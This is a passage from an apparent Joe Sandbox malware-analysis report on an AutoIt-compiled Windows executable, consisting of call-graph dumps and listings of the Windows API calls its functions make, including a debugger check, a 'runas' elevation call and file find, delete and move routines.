API calls __fread_nolock 65546->65771 65548 babb3d 11 API calls 65548->65557 65549 be454e 65774 c0a12a 39 API calls 65549->65774 65551 be4562 65551->65539 65552 ba40e0 11 API calls 65552->65557 65553->65534 65554 bab25f 11 API calls 65554->65559 65555 bab25f 11 API calls 65555->65557 65557->65538 65557->65548 65557->65552 65557->65555 65558 be44d7 65557->65558 65772 c0a12a 39 API calls 65558->65772 65559->65539 65559->65549 65559->65554 65561 ba40e0 11 API calls 65559->65561 65718 baad74 65559->65718 65723 ba3e15 65559->65723 65561->65559 65562 be44f0 65562->65553 65564 ba63ec 65563->65564 65565 ba63e5 65563->65565 65567 ba6403 65564->65567 65568 be5510 FreeLibrary 65564->65568 65811 bcea08 65565->65811 65567->65444 65569->65448 65571 ba5ae6 65570->65571 65573 ba5b8a 65570->65573 65572 bc019b 9 API calls 65571->65572 65575 ba5b18 65571->65575 65572->65575 65573->65456 65574 bc016b 9 API calls 65574->65575 65575->65573 65575->65574 65576->65453 65578 ba634a GetProcAddress 65577->65578 65579 ba6368 65577->65579 65580 ba635a 65578->65580 65582 bce97b 65579->65582 65580->65579 65581 ba6361 FreeLibrary 65580->65581 65581->65579 65608 bce8ba 65582->65608 65584 ba638c 65584->65468 65584->65469 65586 ba632f 65585->65586 65587 ba6310 GetProcAddress 65585->65587 65590 ba6410 65586->65590 65588 ba6320 65587->65588 65588->65586 65589 ba6328 FreeLibrary 65588->65589 65589->65586 65591 bc019b 9 API calls 65590->65591 65592 ba6425 65591->65592 65593 ba41a6 9 API calls 65592->65593 65595 ba6431 __fread_nolock 65593->65595 65594 ba653a 34 API calls 65594->65595 65595->65594 65596 be5572 65595->65596 65599 ba6500 messages 65595->65599 65638 ba6564 65595->65638 65598 ba6564 22 API calls 65596->65598 65600 be55a1 65598->65600 65599->65476 65601 ba653a 34 API calls 65600->65601 65601->65599 65603 be55cc 65602->65603 65604 ba654c 65602->65604 65661 bcec54 65604->65661 65607 c131d2 20 API calls 65607->65484 65610 bce8c6 ___scrt_is_nonwritable_in_current_image 65608->65610 65609 bce8d4 65623 bd2b7c 19 API calls __wsopen_s 65609->65623 65610->65609 65611 bce904 65610->65611 65614 bce8e4 __wsopen_s 65611->65614 65615 bd83f1 65611->65615 65614->65584 65616 bd83fd ___scrt_is_nonwritable_in_current_image 65615->65616 65624 bd32ee EnterCriticalSection 65616->65624 65618 bd840b 65625 bd848b 65618->65625 65622 bd843c __wsopen_s 65622->65614 65623->65614 65624->65618 65629 bd84ae 65625->65629 65626 bd8418 65633 bd8447 65626->65633 65627 bd8507 65636 bd500d 8 API calls pre_c_initialization 65627->65636 65629->65626 65629->65627 65630 bd8510 65631 bd2d58 _free 2 API calls 65630->65631 65632 bd8519 65631->65632 65632->65626 65637 bd3336 LeaveCriticalSection 65633->65637 65635 bd844e 65635->65622 65636->65630 65637->65635 65639 be55ec 65638->65639 65640 ba6573 65638->65640 65643 bcf073 65640->65643 65646 bcee3a 65643->65646 65645 ba6581 65645->65595 65648 bcee46 ___scrt_is_nonwritable_in_current_image 65646->65648 65647 bcee52 65660 bd2b7c 19 API calls __wsopen_s 65647->65660 65648->65647 65649 bcee78 65648->65649 65653 bcef9a 65649->65653 65652 bcee62 __wsopen_s 65652->65645 65654 bcefbc 65653->65654 65656 bcefac 65653->65656 65655 bceec1 SetFilePointerEx GetLastError __dosmaperr 65654->65655 65658 bcefdf 65655->65658 65656->65652 65657 bcf05e 65657->65652 65658->65657 65659 bd97b4 __wsopen_s SetFilePointerEx GetLastError __dosmaperr 65658->65659 65659->65657 65660->65652 65664 bcec71 65661->65664 65663 ba655d 65663->65607 65665 bcec7d ___scrt_is_nonwritable_in_current_image 65664->65665 65666 bcecbd 65665->65666 65667 bcec90 ___scrt_fastfail 65665->65667 65670 bcecb5 __fread_nolock __wsopen_s 65665->65670 65671 bcea88 65666->65671 65678 bd2b7c 19 API calls __wsopen_s 65667->65678 65670->65663 65673 bceab7 65671->65673 65676 bcea9a ___scrt_fastfail 65671->65676 65673->65670 65674 bceaa7 ___scrt_fastfail 65716 bd2b7c 19 API calls __wsopen_s 65674->65716 65676->65673 65676->65674 65679 bd90d5 65676->65679 65717 bcd308 19 API calls 3 library calls 65676->65717 65678->65670 65680 bd90ff 65679->65680 65681 bd90e7 65679->65681 65680->65681 65682 bd914f 65680->65682 65684 bd917f 65680->65684 65681->65676 65683 bd2b7c __wsopen_s 19 API calls 65682->65683 65683->65681 65685 bd9198 65684->65685 65686 bd91da 65684->65686 65688 bd91be 65684->65688 65685->65688 65689 bd91a5 65685->65689 65687 bd3bb0 __fread_nolock 8 API calls 65686->65687 65690 bd91f1 65687->65690 65692 bd2b7c __wsopen_s 19 API calls 65688->65692 65693 bd93b9 65689->65693 65696 bd935c GetConsoleMode 65689->65696 65691 bd2d58 _free RtlFreeHeap GetLastError 65690->65691 65694 bd91fa 65691->65694 65713 bd91d5 __fread_nolock 65692->65713 65695 bd93bd ReadFile 65693->65695 65697 bd2d58 _free RtlFreeHeap GetLastError 65694->65697 65698 bd93d7 65695->65698 65699 bd9431 GetLastError 65695->65699 65696->65693 65700 bd936d 65696->65700 65701 bd9201 65697->65701 65698->65699 65703 bd93ae 65698->65703 65702 bd9455 65699->65702 65699->65713 65700->65695 65704 bd9373 ReadConsoleW 65700->65704 65705 bd97b4 __wsopen_s SetFilePointerEx GetLastError __dosmaperr 65701->65705 65701->65713 65706 bd9395 __dosmaperr 65702->65706 65702->65713 65709 bd93fc 65703->65709 65710 bd9413 65703->65710 65703->65713 65704->65703 65707 bd938f GetLastError 65704->65707 65705->65689 65706->65713 65707->65706 65708 bd2d58 _free RtlFreeHeap GetLastError 65708->65681 65711 bd8df1 __fread_nolock 7 API calls 65709->65711 65712 bd942a 65710->65712 65710->65713 65711->65713 65714 bd8c31 __fread_nolock ReadFile SetFilePointerEx GetLastError __dosmaperr 65712->65714 65713->65708 65715 bd942f 65714->65715 65715->65713 65716->65673 65717->65676 65719 babceb 11 API calls 65718->65719 65720 baad8f 65719->65720 65776 baae12 65720->65776 65722 baad97 65722->65559 65724 bc019b 9 API calls 65723->65724 65725 ba3e2a 65724->65725 65726 bc016b 9 API calls 65725->65726 65727 ba3e35 65726->65727 65728 bc919b 31 API calls 65727->65728 65761 ba3e47 messages 65727->65761 65729 ba3e7b 65728->65729 65730 bc919b 31 API calls 65729->65730 65729->65761 65731 ba3e8f 65730->65731 65732 bc919b 31 API calls 65731->65732 65731->65761 65733 ba3ea7 65732->65733 65734 bc919b 31 API calls 65733->65734 65733->65761 65735 ba3ebf 65734->65735 65736 ba3eca 65735->65736 65737 be4594 65735->65737 65738 bc919b 31 API calls 65736->65738 65805 ba4154 65737->65805 65740 ba3ed7 65738->65740 65741 ba3ee2 65740->65741 65745 be462e 65740->65745 65742 bc919b 31 API calls 65741->65742 65743 bbe2e5 26 API calls 65743->65745 65745->65743 65747 be4662 65745->65747 65745->65761 65747->65761 65761->65559 65768->65494 65769->65490 65770->65546 65771->65553 65772->65562 65773->65562 65774->65551 65775->65507 65777 baae24 65776->65777 65782 baae94 65776->65782 65778 bc019b 9 API calls 65777->65778 65781 baae34 65778->65781 65779 baaebb 65793 c0d2ee 65779->65793 65784 bc016b 9 API calls 65781->65784 65782->65779 65785 baaea8 65782->65785 65783 baae8e 65783->65722 65786 baae42 65784->65786 65785->65777 65787 baaeb1 65785->65787 65803 baaed0 18 API calls __fread_nolock 65786->65803 65804 bbc12e 20 API calls 65787->65804 65790 baae56 65791 ba8774 13 API calls 65790->65791 65792 baae65 messages 65790->65792 65791->65792 65792->65783 65794 babceb 11 API calls 65793->65794 65798 c0d2ff 65794->65798 65795 c0d249 2 API calls 65795->65798 65796 c0d351 65796->65783 65797 c0d32f 65799 c0d249 2 API calls 65797->65799 65798->65795 65798->65796 65798->65797 65800 baacc0 11 API calls 65798->65800 65801 c0d33a 65799->65801 65800->65798 65801->65796 65802 ba6bfa 3 API calls 65801->65802 65802->65796 65803->65790 65804->65783 65806 ba415e _wcslen 65805->65806 65807 bc019b 9 API calls 65806->65807 65808 ba4173 65807->65808 65812 bcea14 ___scrt_is_nonwritable_in_current_image 65811->65812 65813 bcea25 65812->65813 65814 bcea3a 65812->65814 65818 bd2b7c 19 API calls __wsopen_s 65813->65818 65817 bcea35 __wsopen_s 65814->65817 65819 bce992 65814->65819 65817->65564 65818->65817 65820 bce99f 65819->65820 65822 bce9b4 65819->65822 65829 bd2b7c 19 API calls __wsopen_s 65820->65829 65823 bce9af 65822->65823 65830 bd510a 65822->65830 65823->65817 65825 bce9d0 65834 bd89bf 65825->65834 65827 bce9dc 65827->65823 65828 bd2d58 _free 2 API calls 65827->65828 65828->65823 65829->65823 65831 bd5131 65830->65831 65832 bd5120 65830->65832 65831->65825 65832->65831 65833 bd2d58 _free 2 API calls 65832->65833 65833->65831 65835 bd89e3 65834->65835 65836 bd89ce 65834->65836 65837 bd8a0a 65835->65837 65839 bd8a1e 65835->65839 65836->65827 65841 bd8997 65837->65841 65844 bd2b7c 19 API calls __wsopen_s 65839->65844 65845 bd8915 65841->65845 65843 bd89bb 65843->65836 65844->65836 65846 bd8921 ___scrt_is_nonwritable_in_current_image 65845->65846 65847 bd8a3e __wsopen_s FindCloseChangeNotification GetLastError __dosmaperr 65846->65847 65848 bd895c __wsopen_s 65846->65848 65847->65848 65848->65843 65850 ba595e 65849->65850 65858 ba5a7b 65849->65858 65851 bc019b 9 API calls 65850->65851 65850->65858 65853 ba5985 65851->65853 65852 bc019b 9 API calls 65859 ba59fa 65852->65859 65853->65852 65854 ba5ad3 11 API calls 65854->65859 65857 babb3d 11 API calls 65857->65859 65858->65393 65859->65854 65859->65857 65859->65858 65862 bab4b0 65859->65862 65881 c11315 9 API calls 65859->65881 65860->65396 65861->65398 65863 ba7a14 11 API calls 65862->65863 65869 bab4d5 __fread_nolock 65863->65869 65881->65859 65883->65408 65885 bc4f6b IsInExceptionSpec 65884->65885 65886 bc4f84 65885->65886 65887 bc4f72 65885->65887 65908 bd32ee EnterCriticalSection 65886->65908 65922 bc50b9 GetModuleHandleW 65887->65922 65890 bc4f77 65890->65886 65923 bc50fd GetModuleHandleExW 65890->65923 65893 bc4f8b 65903 bc5029 65893->65903 65905 bc5000 65893->65905 65909 bd2538 65893->65909 65896 bc5046 65915 bc5078 65896->65915 65897 bc5072 65931 be20c9 5 API calls _ValidateLocalCookies 65897->65931 65901 bd27b1 _abort 5 API calls 65907 bc5018 65901->65907 65902 bd27b1 _abort 5 API calls 65902->65903 65912 bc5069 65903->65912 65905->65901 65905->65907 65907->65902 65908->65893 65932 bd2271 65909->65932 65951 bd3336 LeaveCriticalSection 65912->65951 65914 bc5042 65914->65896 65914->65897 65916 bc5082 65915->65916 65917 bc50a6 65916->65917 65918 bc5086 GetPEB 65916->65918 65919 bc50fd _abort 8 API calls 65917->65919 65918->65917 65920 bc5096 GetCurrentProcess TerminateProcess 65918->65920 65921 bc50ae ExitProcess 65919->65921 65920->65917 65922->65890 65924 bc514a 65923->65924 65925 bc5127 GetProcAddress 65923->65925 65926 bc5159 65924->65926 65927 bc5150 FreeLibrary 65924->65927 65928 bc513c 65925->65928 65929 bc0e1c _ValidateLocalCookies 5 API calls 65926->65929 65927->65926 65928->65924 65930 bc4f83 65929->65930 65930->65886 65935 bd2220 65932->65935 65934 bd2295 65934->65905 65936 bd222c ___scrt_is_nonwritable_in_current_image 65935->65936 65943 bd32ee EnterCriticalSection 65936->65943 65938 bd223a 65944 bd22c1 65938->65944 65942 bd2258 __wsopen_s 65942->65934 65943->65938 65947 bd22e9 65944->65947 65948 bd22e1 65944->65948 65945 bc0e1c _ValidateLocalCookies 5 API calls 65946 bd2247 65945->65946 65950 bd2265 LeaveCriticalSection _abort 65946->65950 65947->65948 65949 bd2d58 _free 2 API calls 65947->65949 65948->65945 65949->65948 65950->65942 65951->65914 65952 bb230c 65962 bb2315 __fread_nolock 65952->65962 65953 ba8e70 11 API calls 65953->65962 65954 bf7487 65964 ba662b 11 API calls __fread_nolock 65954->65964 65956 bf7493 65960 babe6d 9 API calls 65956->65960 65961 bb1fa7 __fread_nolock 65956->65961 65957 bb2366 65959 ba7cb3 9 API calls 65957->65959 65958 bc016b 9 API calls 65958->65962 65959->65961 65960->65961 65962->65953 65962->65954 65962->65957 65962->65958 65962->65961 65963 bc019b 9 API calls 65962->65963 65963->65962 65964->65956 65965 ba1044 65970 ba2735 65965->65970 65967 ba104a 65994 bc0433 22 API calls __onexit 65967->65994 65969 ba1054 65995 ba29da 65970->65995 65974 ba27ac 66000 ba2d5e 65974->66000 65978 ba2906 65979 bb30e0 9 API calls 65978->65979 65980 ba293b 65979->65980 66008 ba30ed 65980->66008 65982 ba2957 65983 ba2967 GetStdHandle 65982->65983 65984 ba29bc 65983->65984 65985 be39c1 65983->65985 65988 ba29c9 OleInitialize 65984->65988 65985->65984 65986 be39ca 65985->65986 65987 bc016b 9 API calls 65986->65987 65989 be39d1 65987->65989 65988->65967 66013 c109d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 65989->66013 65991 be39da 66014 c11200 CreateThread 65991->66014 65993 be39e6 CloseHandle 65993->65984 65994->65969 65996 ba2a08 65995->65996 65997 ba84b7 11 API calls 65996->65997 65998 ba276b 65997->65998 65999 ba3205 6 API calls 65998->65999 65999->65974 66001 ba2d6e 66000->66001 66002 bc016b 9 API calls 66001->66002 66003 ba28de 66002->66003 66004 ba318c 66003->66004 66005 ba319a 66004->66005 66006 bc016b 9 API calls 66005->66006 66007 ba31d8 RegisterWindowMessageW 66006->66007 66007->65978 66009 be3c69 66008->66009 66010 ba30fd 66008->66010 66011 bc016b 9 API calls 66010->66011 66012 ba3105 66011->66012 66012->65982 66013->65991 66014->65993 66015 c111e6 15 API calls 66014->66015

                Executed Functions

                Function 00BA5D78 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 545 ba5d78-ba5de7 call babf07 GetVersionExW call ba84b7 550 be4f0c-be4f1f 545->550 551 ba5ded 545->551 552 be4f20-be4f24 550->552 553 ba5def-ba5df1 551->553 554 be4f26 552->554 555 be4f27-be4f33 552->555 556 be4f4b 553->556 557 ba5df7-ba5e56 call ba96d9 call ba79ed 553->557 554->555 555->552 558 be4f35-be4f37 555->558 561 be4f52-be4f5e 556->561 570 be50ad-be50b4 557->570 571 ba5e5c-ba5e5e 557->571 558->553 560 be4f3d-be4f44 558->560 560->550 563 be4f46 560->563 564 ba5ecc-ba5ee6 GetCurrentProcess IsWow64Process 561->564 563->556 566 ba5ee8 564->566 567 ba5f45-ba5f4b 564->567 569 ba5eee-ba5efa 566->569 567->569 576 ba5f00-ba5f0f LoadLibraryA 569->576 577 be50f2-be50f6 GetSystemInfo 569->577 574 be50b6 570->574 575 be50d4-be50d7 570->575 572 be4fae-be4fc1 571->572 573 ba5e64-ba5e67 571->573 578 be4fea-be4fec 572->578 579 be4fc3-be4fcc 572->579 573->564 580 ba5e69-ba5eab 573->580 581 be50bc 574->581 582 be50d9-be50e8 575->582 583 be50c2-be50ca 575->583 584 ba5f4d-ba5f57 GetSystemInfo 576->584 585 ba5f11-ba5f1f GetProcAddress 576->585 590 be4fee-be5003 578->590 591 be5021-be5024 578->591 587 be4fce-be4fd4 579->587 588 be4fd9-be4fe5 579->588 580->564 589 ba5ead-ba5eb0 580->589 581->583 582->581 592 be50ea-be50f0 582->592 583->575 586 ba5f27-ba5f29 584->586 585->584 593 ba5f21-ba5f25 GetNativeSystemInfo 585->593 600 ba5f2b-ba5f2c FreeLibrary 586->600 601 ba5f32-ba5f44 586->601 587->564 588->564 594 ba5eb6-ba5ec0 589->594 595 be4f63-be4f6d 589->595 596 be5005-be500b 590->596 597 be5010-be501c 590->597 598 be505f-be5062 591->598 599 be5026-be5041 591->599 592->583 593->586 594->561 602 ba5ec6 594->602 605 be4f6f-be4f7b 595->605 606 be4f80-be4f8a 595->606 596->564 597->564 598->564 607 be5068-be508f 598->607 603 be504e-be505a 599->603 604 be5043-be5049 599->604 600->601 602->564 603->564 604->564 605->564 608 be4f8c-be4f98 606->608 609 be4f9d-be4fa9 606->609 610 be509c-be50a8 607->610 611 be5091-be5097 607->611 608->564 609->564 610->564 611->564
                APIs
                • GetVersionExW.KERNEL32(?), ref: 00BA5DA7
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                • GetCurrentProcess.KERNEL32(?,00C3DC2C,00000000,?,?), ref: 00BA5ED3
                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00BA5EDA
                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BA5F05
                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BA5F17
                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00BA5F25
                • FreeLibrary.KERNEL32(00000000,?,?), ref: 00BA5F2C
                • GetSystemInfo.KERNEL32(?,?,?), ref: 00BA5F51
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                • API String ID: 3290436268-3101561225
                • Opcode ID: 93465fddc8ee2b5d2f92fe2c7d520bc021edce43e23c60f89af2eb15322aecdb
                • Instruction ID: ef91c881169f9455f0effa0eab3cf327f87cd0e1597b712d557a32e7a243adfe
                • Opcode Fuzzy Hash: 93465fddc8ee2b5d2f92fe2c7d520bc021edce43e23c60f89af2eb15322aecdb
                • Instruction Fuzzy Hash: 61A1603595E7C0CFC725CB697C817AD7FE8AB26700B0458D9E48D97272D3284AC8CB65
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BA3312 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                Download Yara Rule

                Control-flow Graph

                APIs
                • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00BA32EF,?), ref: 00BA3342
                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00BA32EF,?), ref: 00BA3355
                • GetFullPathNameW.KERNEL32(00007FFF,?,?,00C72418,00C72400,?,?,?,?,?,?,00BA32EF,?), ref: 00BA33C1
                  • Part of subcall function 00BA84B7: _wcslen.LIBCMT ref: 00BA84CA
                  • Part of subcall function 00BA41E6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00BA33E9,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BA4227
                • SetCurrentDirectoryW.KERNEL32(?,00000001,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BA3442
                • MessageBoxA.USER32 ref: 00BE3C8A
                • SetCurrentDirectoryW.KERNEL32(?,00C72418,?,?,?,?,?,?,?,00BA32EF,?), ref: 00BE3CCB
                • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C631F4,00C72418,?,?,?,?,?,?,?,00BA32EF), ref: 00BE3D54
                • ShellExecuteW.SHELL32(00000000,?,?), ref: 00BE3D5B
                  • Part of subcall function 00BA345A: GetSysColorBrush.USER32(0000000F), ref: 00BA3465
                  • Part of subcall function 00BA345A: LoadCursorW.USER32(00000000,00007F00), ref: 00BA3474
                  • Part of subcall function 00BA345A: LoadIconW.USER32 ref: 00BA348A
                  • Part of subcall function 00BA345A: LoadIconW.USER32 ref: 00BA349C
                  • Part of subcall function 00BA345A: LoadIconW.USER32 ref: 00BA34AE
                  • Part of subcall function 00BA345A: LoadImageW.USER32 ref: 00BA34C6
                  • Part of subcall function 00BA345A: RegisterClassExW.USER32 ref: 00BA3517
                  • Part of subcall function 00BA353A: CreateWindowExW.USER32 ref: 00BA3568
                  • Part of subcall function 00BA353A: CreateWindowExW.USER32 ref: 00BA3589
                  • Part of subcall function 00BA353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA32EF,?), ref: 00BA359D
                  • Part of subcall function 00BA353A: ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA32EF,?), ref: 00BA35A6
                  • Part of subcall function 00BA38F2: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BA39C3
                Strings
                • AutoIt, xrefs: 00BE3C7F
                • runas, xrefs: 00BE3D4F
                • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00BE3C84
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                • API String ID: 683915450-2030392706
                • Opcode ID: aeb49c9b63139028e10f415c40e8f0e5c6e0c3db72254cc49cbfd3af36ad93f4
                • Instruction ID: a1f5b99d2bd6e84694bd906aeb7d713377f90781da1defc61914ec892b24a0d2
                • Opcode Fuzzy Hash: aeb49c9b63139028e10f415c40e8f0e5c6e0c3db72254cc49cbfd3af36ad93f4
                • Instruction Fuzzy Hash: 2651277010C381AECB21EF60EC45F6E7BE8DF96B04F0444ADF486531A2CF248A89D762
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0D836 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 1329 c0d836-c0d894 call babf07 * 3 call ba557e * 2 call c0e958 call c0e9c5 1344 c0d896-c0d89a call ba65a4 1329->1344 1345 c0d89f-c0d8a9 call c0e9c5 1329->1345 1344->1345 1349 c0d8b4-c0d8f2 call babf07 * 2 call ba694e FindFirstFileW 1345->1349 1350 c0d8ab-c0d8af call ba65a4 1345->1350 1358 c0da23-c0da2a FindClose 1349->1358 1359 c0d8f8 1349->1359 1350->1349 1360 c0da2d-c0da5b call babd2c * 5 1358->1360 1361 c0d8fe-c0d900 1359->1361 1361->1358 1362 c0d906-c0d90d 1361->1362 1364 c0d913-c0d979 call bab25f call c0df85 call babd2c call ba7af4 call ba65a4 call c0dc8e 1362->1364 1365 c0d9ef-c0da02 FindNextFileW 1362->1365 1388 c0d97b-c0d97e 1364->1388 1389 c0d99f-c0d9a3 1364->1389 1365->1361 1368 c0da08-c0da0d 1365->1368 1368->1361 1392 c0da12-c0da21 FindClose call babd2c 1388->1392 1393 c0d984-c0d99b call bbe2e5 1388->1393 1390 c0d9d1-c0d9d7 call c0da5c 1389->1390 1391 c0d9a5-c0d9a8 1389->1391 1403 c0d9dc 1390->1403 1395 c0d9b8-c0d9c8 call c0da5c 1391->1395 1396 c0d9aa 1391->1396 1392->1360 1400 c0d9ad-c0d9b6 MoveFileW 1393->1400 1404 c0d99d DeleteFileW 1393->1404 1395->1392 1407 c0d9ca-c0d9cf DeleteFileW 1395->1407 1396->1400 1405 c0d9df-c0d9e1 1400->1405 1403->1405 1404->1389 1405->1392 1408 c0d9e3-c0d9eb call babd2c 1405->1408 1407->1405 1408->1365
                APIs
                  • Part of subcall function 00BA557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA5558,?,?,00BE4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BA559E
                  • Part of subcall function 00C0E9C5: GetFileAttributesW.KERNELBASE(?,00C0D755), ref: 00C0E9C6
                • FindFirstFileW.KERNELBASE(?,?), ref: 00C0D8E2
                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00C0D99D
                • MoveFileW.KERNEL32(?,?), ref: 00C0D9B0
                • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C0D9CD
                • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C0D9F7
                  • Part of subcall function 00C0DA5C: CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00C0D9DC,?,?), ref: 00C0DA72
                • FindClose.KERNEL32(00000000,?,?,?), ref: 00C0DA13
                • FindClose.KERNEL32(00000000), ref: 00C0DA24
                Strings
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                • String ID: \*.*
                • API String ID: 1946585618-1173974218
                • Opcode ID: 0c62f25ea2f5b246210d044152669be9124a561d6ece8bbc37181d001ba38ac7
                • Instruction ID: 1a9e932a6a7ead8cc80c8928c4a357855a83ccde962a8842833fb4611bdff990
                • Opcode Fuzzy Hash: 0c62f25ea2f5b246210d044152669be9124a561d6ece8bbc37181d001ba38ac7
                • Instruction Fuzzy Hash: 09615B3180524DAACF05EFE4DA42EEDB7B9AF15300F2440A5E452B71A2EB315F09DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00C0E387 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                Download Yara Rule
                APIs
                • lstrlenW.KERNEL32(?,00BE4686), ref: 00C0E397
                • GetFileAttributesW.KERNELBASE(?), ref: 00C0E3A6
                • FindFirstFileW.KERNELBASE(?,?), ref: 00C0E3B7
                • FindClose.KERNEL32(00000000), ref: 00C0E3C3
                Memory Dump Source
                • Source File: 00000006.00000002.333898494.0000000000BA1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00BA0000, based on PE: true
                • Associated: 00000006.00000002.333891754.0000000000BA0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C3D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.333987408.0000000000C63000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334023259.0000000000C6D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000C75000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                • Associated: 00000006.00000002.334037576.0000000000CBE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_6_2_ba0000_ihgsvw.jbxd
                Similarity
                • API ID: FileFind$AttributesCloseFirstlstrlen
                • String ID:
                • API String ID: 2695905019-0
                • Opcode ID: 18f5f8c43313debc1fae998aa38b7036732437fbce09bca3701ce83138ef35b6
                • Instruction ID: 9fac1adc245312672ff76624c037f6bc7bb23341c3c3607bf2d924f3a62905be
                • Opcode Fuzzy Hash: 18f5f8c43313debc1fae998aa38b7036732437fbce09bca3701ce83138ef35b6
                • Instruction Fuzzy Hash: 21F0ED30465A1067C221673CBC0EAAF7BAD9E42335B104B11F836C30F0EBB0DEA58696
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00BC5078 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                Download Yara Rule
